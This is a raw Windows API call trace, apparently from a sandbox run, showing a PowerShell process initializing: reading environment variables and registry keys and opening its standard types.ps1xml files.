	[0628.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.227] CoTaskMemFree (pv=0x139d70) 
	[0628.249] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0628.251] CoCreateGuid (in: pguid=0x26da10 | out: pguid=0x26da10*(Data1=0x6114d17c, Data2=0xad92, Data3=0x4c55, Data4=([0]=0x92, [1]=0xd2, [2]=0xb4, [3]=0x4d, [4]=0xea, [5]=0x4d, [6]=0xf5, [7]=0x80))) returned 0x0
	[0628.252] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0628.252] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.252] CoTaskMemFree (pv=0x139d70) 
	[0628.996] WinSqmIsOptedIn () returned 0x0
	[0628.996] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0628.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.996] CoTaskMemFree (pv=0x139d70) 
	[0628.997] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0628.997] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.997] CoTaskMemFree (pv=0x139d70) 
	[0628.998] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0628.998] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.998] CoTaskMemFree (pv=0x139d70) 
	[0628.998] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0628.998] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.998] CoTaskMemFree (pv=0x139d70) 
	[0628.999] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0628.999] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.999] CoTaskMemFree (pv=0x139d70) 
	[0629.000] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0629.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.000] CoTaskMemFree (pv=0x139d70) 
	[0629.000] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0629.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.001] CoTaskMemFree (pv=0x139d70) 
	[0629.001] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0629.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.001] CoTaskMemFree (pv=0x139d70) 
	[0629.005] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0629.005] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.005] CoTaskMemFree (pv=0x139d70) 
	[0629.010] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0629.010] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.010] CoTaskMemFree (pv=0x139d70) 
	[0629.010] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0629.010] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.011] CoTaskMemFree (pv=0x139d70) 
	[0629.011] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0629.011] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.011] CoTaskMemFree (pv=0x139d70) 
	[0637.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0637.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0637.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0637.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0643.722] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0643.722] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0643.722] CoTaskMemFree (pv=0x139d70) 
	[0643.724] CoTaskMemAlloc (cb=0xcc) returned 0x1b87d8b0
	[0643.724] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b87d8b0, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerS") returned 0x76
	[0643.724] CoTaskMemFree (pv=0x1b87d8b0) 
	[0643.724] CoTaskMemAlloc (cb=0xf0) returned 0x1b86bdb0
	[0643.724] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b86bdb0, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0643.724] CoTaskMemFree (pv=0x1b86bdb0) 
	[0643.725] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d588 | out: phkResult=0x26d588*=0x308) returned 0x0
	[0643.725] RegQueryValueExW (in: hKey=0x308, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d50c, lpData=0x0, lpcbData=0x26d508*=0x0 | out: lpType=0x26d50c*=0x2, lpData=0x0, lpcbData=0x26d508*=0x6c) returned 0x0
	[0643.725] CoTaskMemAlloc (cb=0x70) returned 0xee830
	[0643.725] RegQueryValueExW (in: hKey=0x308, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d4dc, lpData=0xee830, lpcbData=0x26d4d8*=0x6c | out: lpType=0x26d4dc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x26d4d8*=0x6c) returned 0x0
	[0643.725] CoTaskMemFree (pv=0xee830) 
	[0643.725] CoTaskMemAlloc (cb=0xcc) returned 0x1b87d8b0
	[0643.725] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b87d8b0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0643.725] CoTaskMemFree (pv=0x1b87d8b0) 
	[0643.725] CoTaskMemAlloc (cb=0xcc) returned 0x1b87d8b0
	[0643.725] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b87d8b0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0643.725] CoTaskMemFree (pv=0x1b87d8b0) 
	[0643.729] RegCloseKey (hKey=0x308) returned 0x0
	[0643.729] CoTaskMemAlloc (cb=0xcc) returned 0x1b87d8b0
	[0643.729] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b87d8b0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0643.729] CoTaskMemFree (pv=0x1b87d8b0) 
	[0643.729] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d588 | out: phkResult=0x26d588*=0x308) returned 0x0
	[0643.729] RegQueryValueExW (in: hKey=0x308, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d50c, lpData=0x0, lpcbData=0x26d508*=0x0 | out: lpType=0x26d50c*=0x0, lpData=0x0, lpcbData=0x26d508*=0x0) returned 0x2
	[0643.730] RegCloseKey (hKey=0x308) returned 0x0
	[0644.025] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0644.025] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0644.025] CoTaskMemFree (pv=0x139d70) 
	[0644.027] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0644.027] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0644.027] CoTaskMemFree (pv=0x139d70) 
	[0644.031] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0644.031] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0644.031] CoTaskMemFree (pv=0x139d70) 
	[0644.031] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0644.031] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0644.031] CoTaskMemFree (pv=0x139d70) 
	[0644.033] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d378 | out: phkResult=0x26d378*=0x308) returned 0x0
	[0644.034] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x26d38c, lpData=0x0, lpcbData=0x26d388*=0x0 | out: lpType=0x26d38c*=0x1, lpData=0x0, lpcbData=0x26d388*=0x74) returned 0x0
	[0644.034] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x26d2fc, lpData=0x0, lpcbData=0x26d2f8*=0x0 | out: lpType=0x26d2fc*=0x1, lpData=0x0, lpcbData=0x26d2f8*=0x74) returned 0x0
	[0644.034] CoTaskMemAlloc (cb=0x78) returned 0xee830
	[0644.034] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x26d2cc, lpData=0xee830, lpcbData=0x26d2c8*=0x74 | out: lpType=0x26d2cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x26d2c8*=0x74) returned 0x0
	[0644.034] CoTaskMemFree (pv=0xee830) 
	[0644.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x26d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0644.035] SetErrorMode (uMode=0x1) returned 0x1
	[0644.035] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x26d250 | out: lpFileInformation=0x26d250*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0644.035] SetErrorMode (uMode=0x1) returned 0x1
	[0644.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0644.038] SetErrorMode (uMode=0x1) returned 0x1
	[0644.038] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d250 | out: lpFileInformation=0x26d250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0644.039] SetErrorMode (uMode=0x1) returned 0x1
	[0644.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0644.044] SetErrorMode (uMode=0x1) returned 0x1
	[0644.044] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d250 | out: lpFileInformation=0x26d250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0644.044] SetErrorMode (uMode=0x1) returned 0x1
	[0644.046] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0644.046] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0644.046] CoTaskMemFree (pv=0x139d70) 
	[0646.132] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0646.132] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0646.133] CoTaskMemFree (pv=0x139d70) 
	[0646.134] GetACP () returned 0x4e4
	[0646.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0646.154] SetErrorMode (uMode=0x1) returned 0x1
	[0646.155] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0646.156] GetFileType (hFile=0x310) returned 0x1
	[0646.156] SetErrorMode (uMode=0x1) returned 0x1
	[0646.156] GetFileType (hFile=0x310) returned 0x1
	[0646.158] ReadFile (in: hFile=0x310, lpBuffer=0x2d5e000, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2d5e000*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0646.159] ReadFile (in: hFile=0x310, lpBuffer=0x2d5e000, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2d5e000*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0646.160] ReadFile (in: hFile=0x310, lpBuffer=0x2d5e000, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2d5e000*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0646.160] ReadFile (in: hFile=0x310, lpBuffer=0x2d5e000, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2d5e000*, lpNumberOfBytesRead=0x26d188*=0xcf3, lpOverlapped=0x0) returned 1
	[0646.160] ReadFile (in: hFile=0x310, lpBuffer=0x2d5d45b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2d5d45b*, lpNumberOfBytesRead=0x26d188*=0x0, lpOverlapped=0x0) returned 1
	[0646.160] ReadFile (in: hFile=0x310, lpBuffer=0x2d5e000, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2d5e000*, lpNumberOfBytesRead=0x26d188*=0x0, lpOverlapped=0x0) returned 1
	[0646.161] CloseHandle (hObject=0x310) returned 1
	[0646.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0646.164] SetErrorMode (uMode=0x1) returned 0x1
	[0646.164] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d100 | out: lpFileInformation=0x26d100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0646.165] SetErrorMode (uMode=0x1) returned 0x1
	[0646.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0646.167] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1e8 | out: phkResult=0x26d1e8*=0x310) returned 0x0
	[0646.167] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d16c, lpData=0x0, lpcbData=0x26d168*=0x0 | out: lpType=0x26d16c*=0x1, lpData=0x0, lpcbData=0x26d168*=0x56) returned 0x0
	[0646.167] CoTaskMemAlloc (cb=0x5a) returned 0x1454f0
	[0646.167] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d13c, lpData=0x1454f0, lpcbData=0x26d138*=0x56 | out: lpType=0x26d13c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d138*=0x56) returned 0x0
	[0646.167] CoTaskMemFree (pv=0x1454f0) 
	[0646.167] RegCloseKey (hKey=0x310) returned 0x0
	[0646.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0646.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0648.297] VirtualQuery (in: lpAddress=0x26bed0, lpBuffer=0x26cd90, dwLength=0x30 | out: lpBuffer=0x26cd90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0649.783] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0649.784] GetFileType (hFile=0x310) returned 0x1
	[0649.784] SetErrorMode (uMode=0x1) returned 0x1
	[0649.784] GetFileType (hFile=0x310) returned 0x1
	[0649.784] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.784] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
